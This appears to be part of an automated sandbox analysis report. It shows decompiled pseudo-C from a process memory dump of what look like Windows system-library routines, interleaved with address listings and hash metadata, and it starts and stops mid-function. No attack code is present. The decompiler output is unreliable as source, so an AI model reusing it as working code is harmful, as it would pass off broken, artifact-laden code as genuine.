                                                              				_t60 = _v32;
                                                              				_t97 = (_t60 != 0x100000) + 1;
                                                              				_t83 = (_v44 -  *0x4c88b04 >> 0x14) + (_v44 -  *0x4c88b04 >> 0x14);
                                                              				_v28 = (_t60 != 0x100000) + 1;
                                                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                              				_v40 = _t62;
                                                              				if(_t83 >= _t62) {
                                                              					L10:
                                                              					asm("lock xadd [eax], ecx");
                                                              					asm("lock xadd [eax], ecx");
                                                              					if(E04BB7D50() == 0) {
                                                              						_t67 = 0x7ffe0380;
                                                              					} else {
                                                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              					}
                                                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                              						E04C5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                              					}
                                                              					if(E04BB7D50() == 0) {
                                                              						_t69 = 0x7ffe0388;
                                                              					} else {
                                                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              					}
                                                              					if( *_t69 != 0) {
                                                              						E04C4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                              					}
                                                              					if(( *0x4c88724 & 0x00000008) != 0) {
                                                              						E04C552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                              					}
                                                              					_t117 = _v44;
                                                              					goto L26;
                                                              				}
                                                              				while(E04C615B5(0x4c88ae4, _t83, _t97, _t97) >= 0) {
                                                              					_t97 = _v28;
                                                              					_t83 = _t83 + 2;
                                                              					if(_t83 < _v40) {
                                                              						continue;
                                                              					}
                                                              					goto L10;
                                                              				}
                                                              				goto L24;
                                                              			}
























                                                              0x04c60eb7
                                                              0x04c60eb9
                                                              0x04c60ec0
                                                              0x04c60ec2
                                                              0x04c60ecd
                                                              0x04c6105b
                                                              0x04c6105b
                                                              0x04c61061
                                                              0x04c61066
                                                              0x04c61066
                                                              0x04c6106b
                                                              0x04c61073
                                                              0x04c61073
                                                              0x04c60ed3
                                                              0x04c60ed6
                                                              0x04c60edc
                                                              0x04c60ee0
                                                              0x04c60ee7
                                                              0x04c60ef0
                                                              0x04c60ef5
                                                              0x04c60efa
                                                              0x04c60efc
                                                              0x04c60efd
                                                              0x04c60f03
                                                              0x04c60f04
                                                              0x04c60f06
                                                              0x04c60f07
                                                              0x04c60f09
                                                              0x04c60f0e
                                                              0x04c60f14
                                                              0x04c60f23
                                                              0x04c60f2d
                                                              0x04c60f34
                                                              0x04c60f34
                                                              0x04c60f14
                                                              0x04c60f52
                                                              0x00000000
                                                              0x00000000
                                                              0x04c60f58
                                                              0x04c60f73
                                                              0x04c60f74
                                                              0x04c60f79
                                                              0x04c60f7d
                                                              0x04c60f80
                                                              0x04c60f86
                                                              0x04c60fab
                                                              0x04c60fb5
                                                              0x04c60fc6
                                                              0x04c60fd1
                                                              0x04c60fe3
                                                              0x04c60fd3
                                                              0x04c60fdc
                                                              0x04c60fdc
                                                              0x04c60feb
                                                              0x04c61009
                                                              0x04c61009
                                                              0x04c61015
                                                              0x04c61027
                                                              0x04c61017
                                                              0x04c61020
                                                              0x04c61020
                                                              0x04c6102f
                                                              0x04c6103c
                                                              0x04c6103c
                                                              0x04c61048
                                                              0x04c61050
                                                              0x04c61050
                                                              0x04c61055
                                                              0x00000000
                                                              0x04c61055
                                                              0x04c60f88
                                                              0x04c60f9e
                                                              0x04c60fa2
                                                              0x04c60fa9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c60fa9
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: a787761eb0a2e28eb1abda7141b983a25a4b85c5932ce66b485bd2e2e43472ca
                                                              • Instruction ID: 21428cd115ddb87c0cf8abc291ba0e494e857f16b11a15c9c1da0bb977e4546e
                                                              • Opcode Fuzzy Hash: a787761eb0a2e28eb1abda7141b983a25a4b85c5932ce66b485bd2e2e43472ca
                                                              • Instruction Fuzzy Hash: 65519D712043419FE724DF29D9C4B2BB7E6EBC4704F08892CF99697290DA71F945C762
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E04BCF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				char* _v20;
                                                              				intOrPtr _v24;
                                                              				char _v28;
                                                              				intOrPtr _v32;
                                                              				char _v36;
                                                              				char _v44;
                                                              				char _v52;
                                                              				intOrPtr _v56;
                                                              				char _v60;
                                                              				intOrPtr _v72;
                                                              				void* _t51;
                                                              				void* _t58;
                                                              				signed short _t82;
                                                              				short _t84;
                                                              				signed int _t91;
                                                              				signed int _t100;
                                                              				signed short* _t103;
                                                              				void* _t108;
                                                              				intOrPtr* _t109;
                                                              
                                                              				_t103 = __ecx;
                                                              				_t82 = __edx;
                                                              				_t51 = E04BB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                              				if(_t51 >= 0) {
                                                              					_push(0x21);
                                                              					_push(3);
                                                              					_v56 =  *0x7ffe02dc;
                                                              					_v20 =  &_v52;
                                                              					_push( &_v44);
                                                              					_v28 = 0x18;
                                                              					_push( &_v28);
                                                              					_push(0x100020);
                                                              					_v24 = 0;
                                                              					_push( &_v60);
                                                              					_v16 = 0x40;
                                                              					_v12 = 0;
                                                              					_v8 = 0;
                                                              					_t58 = E04BD9830();
                                                              					_t87 =  *[fs:0x30];
                                                              					_t108 = _t58;
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                              					if(_t108 < 0) {
                                                              						L11:
                                                              						_t51 = _t108;
                                                              					} else {
                                                              						_push(4);
                                                              						_push(8);
                                                              						_push( &_v36);
                                                              						_push( &_v44);
                                                              						_push(_v60);
                                                              						_t108 = E04BD9990();
                                                              						if(_t108 < 0) {
                                                              							L10:
                                                              							_push(_v60);
                                                              							E04BD95D0();
                                                              							goto L11;
                                                              						} else {
                                                              							_t109 = L04BB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                              							if(_t109 == 0) {
                                                              								_t108 = 0xc0000017;
                                                              								goto L10;
                                                              							} else {
                                                              								_t21 = _t109 + 0x18; // 0x18
                                                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                              								 *_t109 = 1;
                                                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                              								 *(_t109 + 0xe) = _t82;
                                                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                              								E04BDF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                              								_t91 =  *_t103 & 0x0000ffff;
                                                              								_t100 = _t91 & 0xfffffffe;
                                                              								_t84 = 0x5c;
                                                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                              										_push(_v60);
                                                              										E04BD95D0();
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                              										_t51 = 0xc0000106;
                                                              									} else {
                                                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                              										goto L5;
                                                              									}
                                                              								} else {
                                                              									L5:
                                                              									 *_a4 = _t109;
                                                              									_t51 = 0;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t51;
                                                              			}

























                                                              0x04bcf0d3
                                                              0x04bcf0d9
                                                              0x04bcf0e0
                                                              0x04bcf0e7
                                                              0x04bcf0f2
                                                              0x04bcf0f4
                                                              0x04bcf0f8
                                                              0x04bcf100
                                                              0x04bcf108
                                                              0x04bcf10d
                                                              0x04bcf115
                                                              0x04bcf116
                                                              0x04bcf11f
                                                              0x04bcf123
                                                              0x04bcf124
                                                              0x04bcf12c
                                                              0x04bcf130
                                                              0x04bcf134
                                                              0x04bcf13d
                                                              0x04bcf144
                                                              0x04bcf14b
                                                              0x04bcf152
                                                              0x04c0bab0
                                                              0x04c0bab0
                                                              0x04bcf158
                                                              0x04bcf158
                                                              0x04bcf15a
                                                              0x04bcf160
                                                              0x04bcf165
                                                              0x04bcf166
                                                              0x04bcf16f
                                                              0x04bcf173
                                                              0x04c0baa7
                                                              0x04c0baa7
                                                              0x04c0baab
                                                              0x00000000
                                                              0x04bcf179
                                                              0x04bcf18d
                                                              0x04bcf191
                                                              0x04c0baa2
                                                              0x00000000
                                                              0x04bcf197
                                                              0x04bcf19b
                                                              0x04bcf1a2
                                                              0x04bcf1a9
                                                              0x04bcf1af
                                                              0x04bcf1b2
                                                              0x04bcf1b6
                                                              0x04bcf1b9
                                                              0x04bcf1c4
                                                              0x04bcf1d8
                                                              0x04bcf1df
                                                              0x04bcf1e3
                                                              0x04bcf1eb
                                                              0x04bcf1ee
                                                              0x04bcf1f4
                                                              0x04bcf20f
                                                              0x04c0bab7
                                                              0x04c0babb
                                                              0x04c0bacc
                                                              0x04c0bad1
                                                              0x04bcf215
                                                              0x04bcf218
                                                              0x04bcf226
                                                              0x04bcf22b
                                                              0x00000000
                                                              0x04bcf22b
                                                              0x04bcf1f6
                                                              0x04bcf1f6
                                                              0x04bcf1f9
                                                              0x04bcf1fb
                                                              0x04bcf1fb
                                                              0x04bcf1f4
                                                              0x04bcf191
                                                              0x04bcf173
                                                              0x04bcf152
                                                              0x04bcf203

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction ID: a300d47beb729c9b2d7e0682d3b6537aff920768b90e630adee09ef00d52874c
                                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction Fuzzy Hash: 67517A71604710AFD320DF69C840A6BBBF9FF88714F008A6EF99587690E7B4E914CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E04C13540(intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v88;
                                                              				intOrPtr _v92;
                                                              				char _v96;
                                                              				char _v352;
                                                              				char _v1072;
                                                              				intOrPtr _v1140;
                                                              				intOrPtr _v1148;
                                                              				char _v1152;
                                                              				char _v1156;
                                                              				char _v1160;
                                                              				char _v1164;
                                                              				char _v1168;
                                                              				char* _v1172;
                                                              				short _v1174;
                                                              				char _v1176;
                                                              				char _v1180;
                                                              				char _v1192;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				short _t41;
                                                              				short _t42;
                                                              				intOrPtr _t80;
                                                              				intOrPtr _t81;
                                                              				signed int _t82;
                                                              				void* _t83;
                                                              
                                                              				_v12 =  *0x4c8d360 ^ _t82;
                                                              				_t41 = 0x14;
                                                              				_v1176 = _t41;
                                                              				_t42 = 0x16;
                                                              				_v1174 = _t42;
                                                              				_v1164 = 0x100;
                                                              				_v1172 = L"BinaryHash";
                                                              				_t81 = E04BD0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                              				if(_t81 < 0) {
                                                              					L11:
                                                              					_t75 = _t81;
                                                              					E04C13706(0, _t81, _t79, _t80);
                                                              					L12:
                                                              					if(_a4 != 0xc000047f) {
                                                              						E04BDFA60( &_v1152, 0, 0x50);
                                                              						_v1152 = 0x60c201e;
                                                              						_v1148 = 1;
                                                              						_v1140 = E04C13540;
                                                              						E04BDFA60( &_v1072, 0, 0x2cc);
                                                              						_push( &_v1072);
                                                              						E04BEDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                              						E04C20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                              						_push(_v1152);
                                                              						_push(0xffffffff);
                                                              						E04BD97C0();
                                                              					}
                                                              					return E04BDB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                              				}
                                                              				_t79 =  &_v352;
                                                              				_t81 = E04C13971(0, _a4,  &_v352,  &_v1156);
                                                              				if(_t81 < 0) {
                                                              					goto L11;
                                                              				}
                                                              				_t75 = _v1156;
                                                              				_t79 =  &_v1160;
                                                              				_t81 = E04C13884(_v1156,  &_v1160,  &_v1168);
                                                              				if(_t81 >= 0) {
                                                              					_t80 = _v1160;
                                                              					E04BDFA60( &_v96, 0, 0x50);
                                                              					_t83 = _t83 + 0xc;
                                                              					_push( &_v1180);
                                                              					_push(0x50);
                                                              					_push( &_v96);
                                                              					_push(2);
                                                              					_push( &_v1176);
                                                              					_push(_v1156);
                                                              					_t81 = E04BD9650();
                                                              					if(_t81 >= 0) {
                                                              						if(_v92 != 3 || _v88 == 0) {
                                                              							_t81 = 0xc000090b;
                                                              						}
                                                              						if(_t81 >= 0) {
                                                              							_t75 = _a4;
                                                              							_t79 =  &_v352;
                                                              							E04C13787(_a4,  &_v352, _t80);
                                                              						}
                                                              					}
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                              				}
                                                              				_push(_v1156);
                                                              				E04BD95D0();
                                                              				if(_t81 >= 0) {
                                                              					goto L12;
                                                              				} else {
                                                              					goto L11;
                                                              				}
                                                              			}































                                                              0x04c13552
                                                              0x04c1355a
                                                              0x04c1355d
                                                              0x04c13566
                                                              0x04c13567
                                                              0x04c1357e
                                                              0x04c1358f
                                                              0x04c135a1
                                                              0x04c135a5
                                                              0x04c1366b
                                                              0x04c1366b
                                                              0x04c1366d
                                                              0x04c13672
                                                              0x04c13679
                                                              0x04c13685
                                                              0x04c1368d
                                                              0x04c1369d
                                                              0x04c136a7
                                                              0x04c136b8
                                                              0x04c136c6
                                                              0x04c136c7
                                                              0x04c136dc
                                                              0x04c136e1
                                                              0x04c136e7
                                                              0x04c136e9
                                                              0x04c136e9
                                                              0x04c13703
                                                              0x04c13703
                                                              0x04c135b5
                                                              0x04c135c0
                                                              0x04c135c4
                                                              0x00000000
                                                              0x00000000
                                                              0x04c135ca
                                                              0x04c135d7
                                                              0x04c135e2
                                                              0x04c135e6
                                                              0x04c135e8
                                                              0x04c135f5
                                                              0x04c135fa
                                                              0x04c13603
                                                              0x04c13604
                                                              0x04c13609
                                                              0x04c1360a
                                                              0x04c13612
                                                              0x04c13613
                                                              0x04c1361e
                                                              0x04c13622
                                                              0x04c13628
                                                              0x04c1362f
                                                              0x04c1362f
                                                              0x04c13636
                                                              0x04c13638
                                                              0x04c1363b
                                                              0x04c13642
                                                              0x04c13642
                                                              0x04c13636
                                                              0x04c13657
                                                              0x04c13657
                                                              0x04c1365c
                                                              0x04c13662
                                                              0x04c13669
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: BinaryHash
                                                              • API String ID: 2994545307-2202222882
                                                              • Opcode ID: e6ceae0d6b01157f60daa2852426cfe7c52b245ffb9417fd7e348dbcc04617b5
                                                              • Instruction ID: e80924bbeca7c2fd738c3eca5065b4ea6dd9ec86c09ae4f4520a43b79247c48b
                                                              • Opcode Fuzzy Hash: e6ceae0d6b01157f60daa2852426cfe7c52b245ffb9417fd7e348dbcc04617b5
                                                              • Instruction Fuzzy Hash: 5C4146F1D0056C9BEB21DA50CC84FEEB77DAB4571CF0045E5EA09A7250EB30AE899F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E04C13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr* _v16;
                                                              				char* _v20;
                                                              				short _v22;
                                                              				char _v24;
                                                              				intOrPtr _t38;
                                                              				short _t40;
                                                              				short _t41;
                                                              				void* _t44;
                                                              				intOrPtr _t47;
                                                              				void* _t48;
                                                              
                                                              				_v16 = __edx;
                                                              				_t40 = 0x14;
                                                              				_v24 = _t40;
                                                              				_t41 = 0x16;
                                                              				_v22 = _t41;
                                                              				_t38 = 0;
                                                              				_v12 = __ecx;
                                                              				_push( &_v8);
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push(2);
                                                              				_t43 =  &_v24;
                                                              				_v20 = L"BinaryName";
                                                              				_push( &_v24);
                                                              				_push(__ecx);
                                                              				_t47 = 0;
                                                              				_t48 = E04BD9650();
                                                              				if(_t48 >= 0) {
                                                              					_t48 = 0xc000090b;
                                                              				}
                                                              				if(_t48 != 0xc0000023) {
                                                              					_t44 = 0;
                                                              					L13:
                                                              					if(_t48 < 0) {
                                                              						L16:
                                                              						if(_t47 != 0) {
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                              						}
                                                              						L18:
                                                              						return _t48;
                                                              					}
                                                              					 *_v16 = _t38;
                                                              					 *_a4 = _t47;
                                                              					goto L18;
                                                              				}
                                                              				_t47 = L04BB4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                              				if(_t47 != 0) {
                                                              					_push( &_v8);
                                                              					_push(_v8);
                                                              					_push(_t47);
                                                              					_push(2);
                                                              					_push( &_v24);
                                                              					_push(_v12);
                                                              					_t48 = E04BD9650();
                                                              					if(_t48 < 0) {
                                                              						_t44 = 0;
                                                              						goto L16;
                                                              					}
                                                              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                              						_t48 = 0xc000090b;
                                                              					}
                                                              					_t44 = 0;
                                                              					if(_t48 < 0) {
                                                              						goto L16;
                                                              					} else {
                                                              						_t17 = _t47 + 0xc; // 0xc
                                                              						_t38 = _t17;
                                                              						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                              							_t48 = 0xc000090b;
                                                              						}
                                                              						goto L13;
                                                              					}
                                                              				}
                                                              				_t48 = _t48 + 0xfffffff4;
                                                              				goto L18;
                                                              			}















                                                              0x04c13893
                                                              0x04c13896
                                                              0x04c13899
                                                              0x04c1389f
                                                              0x04c138a0
                                                              0x04c138a4
                                                              0x04c138a9
                                                              0x04c138ac
                                                              0x04c138ad
                                                              0x04c138ae
                                                              0x04c138af
                                                              0x04c138b1
                                                              0x04c138b4
                                                              0x04c138bb
                                                              0x04c138bc
                                                              0x04c138bd
                                                              0x04c138c4
                                                              0x04c138c8
                                                              0x04c138ca
                                                              0x04c138ca
                                                              0x04c138d5
                                                              0x04c1393e
                                                              0x04c13940
                                                              0x04c13942
                                                              0x04c13952
                                                              0x04c13954
                                                              0x04c13961
                                                              0x04c13961
                                                              0x04c13967
                                                              0x04c1396e
                                                              0x04c1396e
                                                              0x04c13947
                                                              0x04c1394c
                                                              0x00000000
                                                              0x04c1394c
                                                              0x04c138ea
                                                              0x04c138ee
                                                              0x04c138f8
                                                              0x04c138f9
                                                              0x04c138ff
                                                              0x04c13900
                                                              0x04c13902
                                                              0x04c13903
                                                              0x04c1390b
                                                              0x04c1390f
                                                              0x04c13950
                                                              0x00000000
                                                              0x04c13950
                                                              0x04c13915
                                                              0x04c1391d
                                                              0x04c1391d
                                                              0x04c13922
                                                              0x04c13926
                                                              0x00000000
                                                              0x04c13928
                                                              0x04c1392b
                                                              0x04c1392b
                                                              0x04c13935
                                                              0x04c13937
                                                              0x04c13937
                                                              0x00000000
                                                              0x04c13935
                                                              0x04c13926
                                                              0x04c138f0
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: BinaryName
                                                              • API String ID: 2994545307-215506332
                                                              • Opcode ID: 8f236be9982b55618a31c62b1ce8ac0aea433c305ff3241373ff796a647d4f33
                                                              • Instruction ID: a9a220ca862950ac7871b6b295061664c04def71f9abca76e5ee0902ad3d4a41
                                                              • Opcode Fuzzy Hash: 8f236be9982b55618a31c62b1ce8ac0aea433c305ff3241373ff796a647d4f33
                                                              • Instruction Fuzzy Hash: 5231F472A00549AFFB25DA59C945D7BB775EB82728F0141A9AC14A7670D630BE00D7E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 33%
                                                              			E04BCD294(void* __ecx, char __edx, void* __eflags) {
                                                              				signed int _v8;
                                                              				char _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				intOrPtr _v64;
                                                              				char* _v68;
                                                              				intOrPtr _v72;
                                                              				char _v76;
                                                              				signed int _v84;
                                                              				intOrPtr _v88;
                                                              				char _v92;
                                                              				intOrPtr _v96;
                                                              				intOrPtr _v100;
                                                              				char _v104;
                                                              				char _v105;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t35;
                                                              				char _t38;
                                                              				signed int _t40;
                                                              				signed int _t44;
                                                              				signed int _t52;
                                                              				void* _t53;
                                                              				void* _t55;
                                                              				void* _t61;
                                                              				intOrPtr _t62;
                                                              				void* _t64;
                                                              				signed int _t65;
                                                              				signed int _t66;
                                                              
                                                              				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                              				_v8 =  *0x4c8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                              				_v105 = __edx;
                                                              				_push( &_v92);
                                                              				_t52 = 0;
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push( &_v104);
                                                              				_push(0);
                                                              				_t59 = __ecx;
                                                              				_t55 = 2;
                                                              				if(E04BB4120(_t55, __ecx) < 0) {
                                                              					_t35 = 0;
                                                              					L8:
                                                              					_pop(_t61);
                                                              					_pop(_t64);
                                                              					_pop(_t53);
                                                              					return E04BDB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                              				}
                                                              				_v96 = _v100;
                                                              				_t38 = _v92;
                                                              				if(_t38 != 0) {
                                                              					_v104 = _t38;
                                                              					_v100 = _v88;
                                                              					_t40 = _v84;
                                                              				} else {
                                                              					_t40 = 0;
                                                              				}
                                                              				_v72 = _t40;
                                                              				_v68 =  &_v104;
                                                              				_push( &_v52);
                                                              				_v76 = 0x18;
                                                              				_push( &_v76);
                                                              				_v64 = 0x40;
                                                              				_v60 = _t52;
                                                              				_v56 = _t52;
                                                              				_t44 = E04BD98D0();
                                                              				_t62 = _v88;
                                                              				_t65 = _t44;
                                                              				if(_t62 != 0) {
                                                              					asm("lock xadd [edi], eax");
                                                              					if((_t44 | 0xffffffff) != 0) {
                                                              						goto L4;
                                                              					}
                                                              					_push( *((intOrPtr*)(_t62 + 4)));
                                                              					E04BD95D0();
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                              					goto L4;
                                                              				} else {
                                                              					L4:
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                              					if(_t65 >= 0) {
                                                              						_t52 = 1;
                                                              					} else {
                                                              						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                              							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                              						}
                                                              					}
                                                              					_t35 = _t52;
                                                              					goto L8;
                                                              				}
                                                              			}

































                                                              0x04bcd29c
                                                              0x04bcd2a6
                                                              0x04bcd2b1
                                                              0x04bcd2b5
                                                              0x04bcd2b6
                                                              0x04bcd2bc
                                                              0x04bcd2bd
                                                              0x04bcd2be
                                                              0x04bcd2bf
                                                              0x04bcd2c2
                                                              0x04bcd2c4
                                                              0x04bcd2cc
                                                              0x04bcd384
                                                              0x04bcd34b
                                                              0x04bcd34f
                                                              0x04bcd350
                                                              0x04bcd351
                                                              0x04bcd35c
                                                              0x04bcd35c
                                                              0x04bcd2d6
                                                              0x04bcd2da
                                                              0x04bcd2e1
                                                              0x04bcd361
                                                              0x04bcd369
                                                              0x04bcd36d
                                                              0x04bcd2e3
                                                              0x04bcd2e3
                                                              0x04bcd2e3
                                                              0x04bcd2e5
                                                              0x04bcd2ed
                                                              0x04bcd2f5
                                                              0x04bcd2fa
                                                              0x04bcd302
                                                              0x04bcd303
                                                              0x04bcd30b
                                                              0x04bcd30f
                                                              0x04bcd313
                                                              0x04bcd318
                                                              0x04bcd31c
                                                              0x04bcd320
                                                              0x04bcd379
                                                              0x04bcd37d
                                                              0x00000000
                                                              0x00000000
                                                              0x04c0affe
                                                              0x04c0b001
                                                              0x04c0b011
                                                              0x00000000
                                                              0x04bcd322
                                                              0x04bcd322
                                                              0x04bcd330
                                                              0x04bcd337
                                                              0x04bcd35d
                                                              0x04bcd339
                                                              0x04bcd33f
                                                              0x04bcd38c
                                                              0x04bcd38c
                                                              0x04bcd33f
                                                              0x04bcd349
                                                              0x00000000
                                                              0x04bcd349

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: cc2d1fec11d1c847542b00b292cf2cfb50179c9a0ed9ef06043924fde571b4bf
                                                              • Instruction ID: abc6e732f16ae2257e7d8c726b30544cca456df37f8c629e9743985021d87466
                                                              • Opcode Fuzzy Hash: cc2d1fec11d1c847542b00b292cf2cfb50179c9a0ed9ef06043924fde571b4bf
                                                              • Instruction Fuzzy Hash: 453170B56083459FD711DF28C98096BBBECEBC5654F0009BEF99583250E639ED04DBE2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E04BA1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                              				intOrPtr _v8;
                                                              				char _v16;
                                                              				intOrPtr* _t26;
                                                              				intOrPtr _t29;
                                                              				void* _t30;
                                                              				signed int _t31;
                                                              
                                                              				_t27 = __ecx;
                                                              				_t29 = __edx;
                                                              				_t31 = 0;
                                                              				_v8 = __edx;
                                                              				if(__edx == 0) {
                                                              					L18:
                                                              					_t30 = 0xc000000d;
                                                              					goto L12;
                                                              				} else {
                                                              					_t26 = _a4;
                                                              					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                              						goto L18;
                                                              					} else {
                                                              						E04BDBB40(__ecx,  &_v16, __ecx);
                                                              						_push(_t26);
                                                              						_push(0);
                                                              						_push(0);
                                                              						_push(_t29);
                                                              						_push( &_v16);
                                                              						_t30 = E04BDA9B0();
                                                              						if(_t30 >= 0) {
                                                              							_t19 =  *_t26;
                                                              							if( *_t26 != 0) {
                                                              								goto L7;
                                                              							} else {
                                                              								 *_a8 =  *_a8 & 0;
                                                              							}
                                                              						} else {
                                                              							if(_t30 != 0xc0000023) {
                                                              								L9:
                                                              								_push(_t26);
                                                              								_push( *_t26);
                                                              								_push(_t31);
                                                              								_push(_v8);
                                                              								_push( &_v16);
                                                              								_t30 = E04BDA9B0();
                                                              								if(_t30 < 0) {
                                                              									L12:
                                                              									if(_t31 != 0) {
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                              									}
                                                              								} else {
                                                              									 *_a8 = _t31;
                                                              								}
                                                              							} else {
                                                              								_t19 =  *_t26;
                                                              								if( *_t26 == 0) {
                                                              									_t31 = 0;
                                                              								} else {
                                                              									L7:
                                                              									_t31 = L04BB4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                              								}
                                                              								if(_t31 == 0) {
